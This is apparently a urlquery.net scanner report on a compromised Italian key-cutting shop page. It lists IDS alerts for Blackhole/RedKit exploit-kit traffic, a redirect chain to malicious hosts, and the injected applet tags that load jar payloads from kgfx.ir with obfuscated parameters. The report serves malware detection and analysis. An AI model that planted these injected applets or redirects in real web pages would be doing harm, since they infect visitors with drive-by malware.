urlquery.net - Free url scanner

Overview

URL	http://www.ferramentafaba.it/chiavi-porte-auto-legnano.htm
IP	62.149.131.100
ASN	AS31034 Aruba S.p.A.
Location	Italy
Report completed	2012-11-09 12:22:33 CET
Status	Loading report..
urlQuery Alerts	Detected a TDS URL pattern

Settings

UserAgent	Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Adobe Reader	8.0
Java	1.6.0_26

Intrusion Detection Systems

Suricata /w Emerging Threats Pro

Timestamp	Source IP	Destination IP	Severity	Alert
2012-11-09 12:21:52	176.9.136.177	urlQuery Client	2	ET WEB_CLIENT PDF With Unescape Method Defined Possible Hostile Obfuscation Attempt
2012-11-09 12:21:52	176.9.136.177	urlQuery Client	2	ET WEB_CLIENT String Replace in PDF File, Likely Hostile
2012-11-09 12:21:52	176.9.136.177	urlQuery Client	2	ET WEB_CLIENT PDF With Unescape Method Defined Possible Hostile Obfuscation Attempt
2012-11-09 12:21:52	176.9.136.177	urlQuery Client	2	ET WEB_CLIENT String Replace in PDF File, Likely Hostile
2012-11-09 12:21:52	176.9.136.177	urlQuery Client	1	ETPRO WEB_CLIENT Adobe PDF Memory Corruption /Ff Dictionary Key Corruption
2012-11-09 12:21:52	176.9.136.177	urlQuery Client	1	ET CURRENT_EVENTS NuclearPack - PDF Naming Algorithm
2012-11-09 12:21:52	176.9.136.177	urlQuery Client	2	ET WEB_CLIENT PDF With Embedded File
2012-11-09 12:21:52	176.9.136.177	urlQuery Client	2	ET CURRENT_EVENTS Sakura/RedKit obfuscated URL
2012-11-09 12:22:01	176.9.136.177	urlQuery Client	1	ET CURRENT_EVENTS RedKit - Jar File Naming Algorithm
2012-11-09 12:22:01	176.9.136.177	urlQuery Client	1	ET CURRENT_EVENTS Blackhole - Jar File Naming Algorithm
2012-11-09 12:22:01	176.9.136.177	urlQuery Client	3	FILEMAGIC Zip archive data
2012-11-09 12:22:01	176.9.136.177	urlQuery Client	1	ET TROJAN Generic - 8Char.JAR Naming Algorithm
2012-11-09 12:22:02	176.9.136.177	urlQuery Client	1	ET CURRENT_EVENTS DRIVEBY Generic - 8Char.JAR Naming Algorithm
2012-11-09 12:22:02	176.9.136.177	urlQuery Client	3	FILEMAGIC Zip archive data
2012-11-09 12:22:02	176.9.136.177	urlQuery Client	1	ET TROJAN Generic - 8Char.JAR Naming Algorithm
2012-11-09 12:22:02	176.9.136.177	urlQuery Client	1	ET CURRENT_EVENTS RedKit - Jar File Naming Algorithm
2012-11-09 12:22:02	176.9.136.177	urlQuery Client	1	ET CURRENT_EVENTS Blackhole - Jar File Naming Algorithm
2012-11-09 12:22:02	176.9.136.177	urlQuery Client	1	ET CURRENT_EVENTS DRIVEBY Generic - 8Char.JAR Naming Algorithm
2012-11-09 12:22:05	176.9.136.177	urlQuery Client	1	ET MALWARE Possible Windows executable sent when remote host claims to send html content
2012-11-09 12:22:05	176.9.136.177	urlQuery Client	1	ET SHELLCODE Possible Call with No Offset TCP Shellcode
2012-11-09 12:22:05	176.9.136.177	urlQuery Client	3	FILEMAGIC windows executable

Snort /w Sourcefire VRT

Timestamp	Source IP	Destination IP	Severity	Alert
2012-11-09 12:21:45	62.149.131.100	urlQuery Client	3	http_inspect: JAVASCRIPT WHITESPACES EXCEEDS MAX ALLOWED
2012-11-09 12:21:52	176.9.136.177	urlQuery Client	1	FILE-PDF EmbeddedFile contained within a PDF
2012-11-09 12:22:05	176.9.136.177	urlQuery Client	3	FILE-IDENTIFY Portable Executable binary file magic detected

Recent reports on same IP/ASN/Domain

Last 6 reports on IP: 62.149.131.100

Date	Alerts / IDS	URL	IP
2013-01-09 06:05:45	1 / 1	http://www.ghanjafest.com/ritrattigtp2009/	62.149.131.100
2013-01-08 09:00:48	1 / 1	http://www.ghanjafest.com/ritrattigtp2009/	62.149.131.100
2013-01-03 18:19:01	2 / 1	http://www.ghanjafest.com/ritrattigtp2009/index.html	62.149.131.100
2012-12-24 02:52:11	1 / 1	http://www.ghanjafest.com/festivalPassat/1997/index.html	62.149.131.100
2012-12-10 07:03:57	1 / 1	http://www.ghanjafest.com/ritrattigtp2009/index.html	62.149.131.100
2012-12-05 09:17:35	1 / 1	http://www.ghanjafest.com/ritrattigtp2009/index.html	62.149.131.100

Last 6 reports on ASN: AS31034 Aruba S.p.A.

Date	Alerts / IDS	URL	IP
2013-02-14 01:05:40	0 / 0	http://www.tassinionline.it/r6fljp.php?s=lf	62.149.140.209
2013-02-14 00:35:21	1 / 2	http://www.prenjmegen.it/	62.149.130.72
2013-02-14 00:29:20	1 / 1	http://www.agescicapua4.it/calendario_Attivita_capua_4/April2012.html	62.149.131.211
2013-02-14 00:23:05	2 / 4	http://www.nkctackle.it/product_chart.asp?Id=264	62.149.140.94
2013-02-13 21:33:40	0 / 0	http://www.colpermessodellafortuna.it/i0lwqj.php?s=lf	62.149.130.233
2013-02-13 21:30:54	0 / 1	http://www.colpermessodellafortuna.it/i0lwqj.php?s=lf	62.149.130.233

JavaScript

Executed Scripts (2)

Executed Evals (0)

Executed Writes (3)

#1 JavaScript::Write (size: 297, repeated: 1)

<applet archive="http://kgfx.ir/332.jar" code="Runs.class"><param name="elitken" value="layomiingmhxomiingt6somiinghkwomiing.3bomiing33aomiing3hcomiing/gsomiingrw2omiingix3omiing.ycomiingx42omiingfv4omiinggoromiingkadomiing/1momiing/2zomiing:lgomiingpziomiingt33omiingt30omiingh1zomiing"></applet>

#2 JavaScript::Write (size: 297, repeated: 1)

<applet archive="http://kgfx.ir/887.jar" code="Runs.class"><param name="elitken" value="lttomiingmt2omiingtb9omiinghylomiing.axomiing1s5omiing4gromiing/ehomiingrrqomiingi05omiing.vromiingxv9omiingfysomiinggfxomiingkgcomiing/m1omiing/rvomiing:dzomiingp8bomiingt4eomiingtqaomiingh10omiing"></applet>

#3 JavaScript::Write (size: 21, repeated: 1)

<div id='mira'></div>

HTTP Transactions (28)

Request	Response
GET /chiavi-porte-auto-legnano_file/FABA-LOGO.gif HTTP/1.1 Host: www.ferramentafaba.it User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.ferramentafaba.it/chiavi-porte-auto-legnano.htm	HTTP/1.1 200 OK Content-Type: image/gif Date: Fri, 09 Nov 2012 11:21:45 GMT Content-Length: 1132 Last-Modified: Mon, 05 Nov 2012 15:23:29 GMT Accept-Ranges: bytes Etag: "bc9348269bbcd1:4675e5" Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET
GET /chiavi-porte-auto-legnano.htm HTTP/1.1 Host: www.ferramentafaba.it User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive	HTTP/1.1 200 OK Content-Type: text/html Date: Fri, 09 Nov 2012 11:21:45 GMT Content-Length: 26052 Last-Modified: Wed, 07 Nov 2012 23:52:53 GMT Accept-Ranges: bytes Etag: "741e97043bdcd1:4675e5" Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET
GET /chiavi-porte-auto-legnano_file/punzonate_ita.gif HTTP/1.1 Host: www.ferramentafaba.it User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.ferramentafaba.it/chiavi-porte-auto-legnano.htm	HTTP/1.1 200 OK Content-Type: image/gif Date: Fri, 09 Nov 2012 11:21:45 GMT Content-Length: 4517 Last-Modified: Mon, 05 Nov 2012 15:23:34 GMT Accept-Ranges: bytes Etag: "9bd668569bbcd1:4675e5" Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET
GET /chiavi-porte-auto-legnano_file/chiavi%20auto.gif HTTP/1.1 Host: www.ferramentafaba.it User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.ferramentafaba.it/chiavi-porte-auto-legnano.htm	HTTP/1.1 200 OK Content-Type: image/gif Date: Fri, 09 Nov 2012 11:21:45 GMT Content-Length: 5172 Last-Modified: Mon, 05 Nov 2012 15:23:15 GMT Accept-Ranges: bytes Etag: "acbf1e7a69bbcd1:4675e5" Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET
GET /chiavi-porte-auto-legnano_file/chiavi%20doppia%20mappa.gif HTTP/1.1 Host: www.ferramentafaba.it User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.ferramentafaba.it/chiavi-porte-auto-legnano.htm	HTTP/1.1 200 OK Content-Type: image/gif Date: Fri, 09 Nov 2012 11:21:45 GMT Content-Length: 4476 Last-Modified: Mon, 05 Nov 2012 15:23:18 GMT Accept-Ranges: bytes Etag: "57eaac7b69bbcd1:4675e5" Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET
GET /chiavi-porte-auto-legnano_file/chiavi%20personalizzate.jpg HTTP/1.1 Host: www.ferramentafaba.it User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.ferramentafaba.it/chiavi-porte-auto-legnano.htm	HTTP/1.1 200 OK Content-Type: image/jpeg Date: Fri, 09 Nov 2012 11:21:45 GMT Content-Length: 15908 Last-Modified: Mon, 05 Nov 2012 15:23:19 GMT Accept-Ranges: bytes Etag: "52c307c69bbcd1:4675e5" Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET
GET /chiavi-porte-auto-legnano_file/chiavi%20colorate.jpg HTTP/1.1 Host: www.ferramentafaba.it User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.ferramentafaba.it/chiavi-porte-auto-legnano.htm	HTTP/1.1 200 OK Content-Type: image/jpeg Date: Fri, 09 Nov 2012 11:21:45 GMT Content-Length: 18612 Last-Modified: Mon, 05 Nov 2012 15:23:17 GMT Accept-Ranges: bytes Etag: "466787b69bbcd1:4675e5" Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET
GET /chiavi-porte-auto-legnano_file/dupliactrice%20doppia%20mappa.jpg HTTP/1.1 Host: www.ferramentafaba.it User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.ferramentafaba.it/chiavi-porte-auto-legnano.htm	HTTP/1.1 200 OK Content-Type: image/jpeg Date: Fri, 09 Nov 2012 11:21:45 GMT Content-Length: 53487 Last-Modified: Mon, 05 Nov 2012 15:23:22 GMT Accept-Ranges: bytes Etag: "12d2f97d69bbcd1:4675e5" Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET
GET /chiavi-porte-auto-legnano_file/duplicatrice%20punzonate.jpg HTTP/1.1 Host: www.ferramentafaba.it User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.ferramentafaba.it/chiavi-porte-auto-legnano.htm	HTTP/1.1 200 OK Content-Type: image/jpeg Date: Fri, 09 Nov 2012 11:21:45 GMT Content-Length: 42513 Last-Modified: Mon, 05 Nov 2012 15:23:28 GMT Accept-Ranges: bytes Etag: "395e58169bbcd1:4675e5" Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET
GET /chiavi-porte-auto-legnano_file/doppia%20mappa%20e%20pompa.jpg HTTP/1.1 Host: www.ferramentafaba.it User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.ferramentafaba.it/chiavi-porte-auto-legnano.htm	HTTP/1.1 200 OK Content-Type: image/jpeg Date: Fri, 09 Nov 2012 11:21:45 GMT Content-Length: 39470 Last-Modified: Mon, 05 Nov 2012 15:23:22 GMT Accept-Ranges: bytes Etag: "b56ff77d69bbcd1:4675e5" Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET
GET /chiavi-porte-auto-legnano_file/duplicatrice%20tracciate%20.jpg HTTP/1.1 Host: www.ferramentafaba.it User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.ferramentafaba.it/chiavi-porte-auto-legnano.htm	HTTP/1.1 200 OK Content-Type: image/jpeg Date: Fri, 09 Nov 2012 11:21:45 GMT Content-Length: 40665 Last-Modified: Mon, 05 Nov 2012 15:23:29 GMT Accept-Ranges: bytes Etag: "b7b5878269bbcd1:4675e5" Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET
GET /chiavi-porte-auto-legnano_file/duplicatrice%20chiavi%20piatte.jpg HTTP/1.1 Host: www.ferramentafaba.it User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.ferramentafaba.it/chiavi-porte-auto-legnano.htm	HTTP/1.1 200 OK Content-Type: image/jpeg Date: Fri, 09 Nov 2012 11:21:45 GMT Content-Length: 82053 Last-Modified: Mon, 05 Nov 2012 15:23:27 GMT Accept-Ranges: bytes Etag: "99c7d58069bbcd1:4675e5" Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET
GET /chiavi-porte-auto-legnano_file/POWER%20LINXS.jpg HTTP/1.1 Host: www.ferramentafaba.it User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.ferramentafaba.it/chiavi-porte-auto-legnano.htm	HTTP/1.1 200 OK Content-Type: image/jpeg Date: Fri, 09 Nov 2012 11:21:45 GMT Content-Length: 19715 Last-Modified: Mon, 05 Nov 2012 15:23:32 GMT Accept-Ranges: bytes Etag: "9380d58369bbcd1:4675e5" Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET
GET /chiavi-porte-auto-legnano_file/trasponder.gif HTTP/1.1 Host: www.ferramentafaba.it User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.ferramentafaba.it/chiavi-porte-auto-legnano.htm	HTTP/1.1 200 OK Content-Type: image/gif Date: Fri, 09 Nov 2012 11:21:46 GMT Content-Length: 4542 Last-Modified: Mon, 05 Nov 2012 15:23:53 GMT Accept-Ranges: bytes Etag: "071829069bbcd1:4675e5" Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET
GET /chiavi-porte-auto-legnano_file/laser-punzonate.gif HTTP/1.1 Host: www.ferramentafaba.it User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.ferramentafaba.it/chiavi-porte-auto-legnano.htm	HTTP/1.1 200 OK Content-Type: image/gif Date: Fri, 09 Nov 2012 11:21:46 GMT Content-Length: 5009 Last-Modified: Mon, 05 Nov 2012 15:23:32 GMT Accept-Ranges: bytes Etag: "1e31e68369bbcd1:4675e5" Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET
GET /chiavi-porte-auto-legnano_file/chiavi%20normali.jpg HTTP/1.1 Host: www.ferramentafaba.it User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.ferramentafaba.it/chiavi-porte-auto-legnano.htm	HTTP/1.1 200 OK Content-Type: image/jpeg Date: Fri, 09 Nov 2012 11:21:45 GMT Content-Length: 53517 Last-Modified: Mon, 05 Nov 2012 15:23:18 GMT Accept-Ranges: bytes Etag: "e1d4d77b69bbcd1:4675e5" Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET
GET /chiavi-porte-auto-legnano_file/decryptor.gif HTTP/1.1 Host: www.ferramentafaba.it User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.ferramentafaba.it/chiavi-porte-auto-legnano.htm	HTTP/1.1 200 OK Content-Type: image/gif Date: Fri, 09 Nov 2012 11:21:46 GMT Content-Length: 7344 Last-Modified: Mon, 05 Nov 2012 15:23:19 GMT Accept-Ranges: bytes Etag: "9781457c69bbcd1:4675e5" Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET
GET /chiavi-porte-auto-legnano_file/you%20tube.bmp HTTP/1.1 Host: www.ferramentafaba.it User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.ferramentafaba.it/chiavi-porte-auto-legnano.htm	HTTP/1.1 200 OK Content-Type: image/bmp Date: Fri, 09 Nov 2012 11:21:46 GMT Content-Length: 8478 Last-Modified: Mon, 05 Nov 2012 15:23:54 GMT Accept-Ranges: bytes Etag: "f840549169bbcd1:4675e5" Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET
GET /chiavi-porte-auto-legnano_file/884%20ultegra.jpg HTTP/1.1 Host: www.ferramentafaba.it User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.ferramentafaba.it/chiavi-porte-auto-legnano.htm	HTTP/1.1 200 OK Content-Type: image/jpeg Date: Fri, 09 Nov 2012 11:21:46 GMT Content-Length: 8991 Last-Modified: Mon, 05 Nov 2012 15:23:04 GMT Accept-Ranges: bytes Etag: "c29197369bbcd1:4675e5" Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET
GET /chiavi-porte-auto-legnano_file/chiavi%20auto%20a%20codice.jpg HTTP/1.1 Host: www.ferramentafaba.it User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.ferramentafaba.it/chiavi-porte-auto-legnano.htm	HTTP/1.1 200 OK Content-Type: image/jpeg Date: Fri, 09 Nov 2012 11:21:45 GMT Content-Length: 43360 Last-Modified: Mon, 05 Nov 2012 15:23:13 GMT Accept-Ranges: bytes Etag: "5c6bc77869bbcd1:4675e5" Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET
GET /chiavi-porte-auto-legnano_file/duplicatrice%20chiavi%20auto.jpg HTTP/1.1 Host: www.ferramentafaba.it User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.ferramentafaba.it/chiavi-porte-auto-legnano.htm	HTTP/1.1 200 OK Content-Type: image/jpeg Date: Fri, 09 Nov 2012 11:21:45 GMT Content-Length: 60479 Last-Modified: Mon, 05 Nov 2012 15:23:26 GMT Accept-Ranges: bytes Etag: "6d5938069bbcd1:4675e5" Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET
GET /count4.php HTTP/1.1 Host: huquqxov.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.ferramentafaba.it/chiavi-porte-auto-legnano.htm	HTTP/1.1 302 HTTP/1.1 302 Server: Apache, nginx/0.8.34 Content-Length: 0 Last-Modified: ÃÃ², 09 ÃÃ®Ã¿ 2012 11:22:10 GMT Accept-Ranges: bytes Date: Fri, 09 Nov 2012 11:21:48 GMT X-Powered-By: PHP/5.3.2 Location: http://lovickdiversitycareer.com/hmiq.html
GET /chiavi-porte-auto-legnano_file/chiave%20auto%20telecomando.bmp HTTP/1.1 Host: www.ferramentafaba.it User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.ferramentafaba.it/chiavi-porte-auto-legnano.htm	HTTP/1.1 200 OK Content-Type: image/bmp Date: Fri, 09 Nov 2012 11:21:46 GMT Content-Length: 613590 Last-Modified: Mon, 05 Nov 2012 15:23:14 GMT Accept-Ranges: bytes Etag: "543b997969bbcd1:4675e5" Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET
GET /hmiq.htm HTTP/1.1 Host: kgfx.ir User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.ferramentafaba.it/chiavi-porte-auto-legnano.htm	HTTP/1.1 200 OK Content-Type: text/html Content-Encoding: gzip Vary: Accept-Encoding Date: Fri, 09 Nov 2012 11:21:43 GMT Server: LiteSpeed Connection: close X-Powered-By: PHP/5.2.17 refresh: 12; URL=http://syenial.com/links/1.php Content-Length: 5483
GET /987.pdf HTTP/1.1 Host: kgfx.ir User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://kgfx.ir/hmiq.htm	HTTP/1.1 200 OK Content-Type: application/pdf Date: Fri, 09 Nov 2012 11:21:44 GMT Server: LiteSpeed Connection: close X-Powered-By: PHP/5.2.17 Content-Disposition: inline; filename=d4b5adb1.pdf Content-Length: 6161
GET /favicon.ico HTTP/1.1 Host: www.ferramentafaba.it User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive	HTTP/1.1 404 Not Found Content-Type: text/html Date: Fri, 09 Nov 2012 11:21:59 GMT Content-Length: 1635 Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET
GET /favicon.ico HTTP/1.1 Host: www.ferramentafaba.it User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive	HTTP/1.1 404 Not Found Content-Type: text/html Date: Fri, 09 Nov 2012 11:22:00 GMT Content-Length: 1635 Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET
